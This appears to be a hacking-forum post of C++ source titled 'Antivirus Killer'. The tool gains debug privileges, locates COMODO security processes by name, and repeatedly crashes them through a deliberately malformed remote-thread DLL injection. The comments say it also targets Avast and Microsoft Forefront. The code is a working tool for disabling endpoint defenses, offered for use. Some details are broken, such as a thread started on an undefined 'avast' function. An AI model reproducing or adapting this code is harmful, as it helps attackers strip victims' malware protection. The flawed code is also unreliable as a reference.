//Kills COMODO, Avast and Micro$oft Frorefront //crashes a target process by attempting to inject a dll without enough space allocated for DLL's name //Code snippets taken from Blizzhackers.cc and Rohitab //THX to Napalm,magnetisk, and Nihil² for letting me "borrow" your code //Put together by Cpu_hacker666 //Yes, I IZ A CODE MONKEY XD #include <iostream> #include <windows.h> #include <tlhelp32.h> #include <shlwapi.h> #define dll_name "lol"//Madeup DLL name, SHOULD NOT EXIST using namespace std; bool CrashProcess(DWORD procid); void COMODO(); unsigned long GetProcID(const char *process); BOOL EnablePriv(LPCSTR lpszPriv); // by Napalm int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, LPSTR lpszArgument, int nFunsterStil) { EnablePriv( SE_DEBUG_NAME ); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&avast, 0, 0, NULL); while(1) { Sleep(1); } return 0; } bool CrashProcess(DWORD procid) //Based off magnetisk's poorly written code { if(!procid) { return FALSE; } HANDLE hd; LPVOID gp,rs; gp = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.lib"),"LoadLibraryA"); hd = OpenProcess(PROCESS_ALL_ACCESS,FALSE,procid); rs = (LPVOID)VirtualAllocEx(hd, NULL, strlen(dll_name), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(hd, (LPVOID)rs, dll_name,strlen(dll_name), NULL); CreateRemoteThread(hd,NULL,0,(LPTHREAD_START_ROUTINE)gp,(LPVOID)rs,0,0); return TRUE; } unsigned long GetProcID(const char *process) //by Nihil² { PROCESSENTRY32 pe = {0}; HANDLE thSnapshot = {0}; BOOL retval = false; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Error: Unable to create toolhelp snapshot!", "Loader", MB_ICONERROR); return 0; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, process)) { return pe.th32ProcessID; } retval = Process32Next(thSnapshot,&pe); } return 0; } BOOL EnablePriv(LPCSTR lpszPriv) // by Napalm { HANDLE hToken; LUID luid; TOKEN_PRIVILEGES tkprivs; ZeroMemory(&tkprivs, sizeof(tkprivs)); if(!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken)) return FALSE; if(!LookupPrivilegeValue(NULL, lpszPriv, &luid)){ CloseHandle(hToken); return FALSE; } tkprivs.PrivilegeCount = 1; tkprivs.Privileges[0].Luid = luid; tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; BOOL bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL); CloseHandle(hToken); return bRet; } void COMODO() { while(1) { if(GetProcID("cfp.exe")) CrashProcess(GetProcID("cfp.exe")); if(GetProcID("cfplogvw.exe")) CrashProcess(GetProcID("cfplogvw.exe")); if(GetProcID("cavscan.exe")) CrashProcess(GetProcID("cavscan.exe")); if(GetProcID("cfpupdat.exe")) CrashProcess(GetProcID("cfpupdat.exe")); if(GetProcID("cmdagent.exe")) CrashProcess(GetProcID("cmdagent.exe")); if(GetProcID("crashrep.exe")) CrashProcess(GetProcID("crashrep.exe")); Sleep(100); } }
My LogiX is Undeniable.
Antivirus Killer
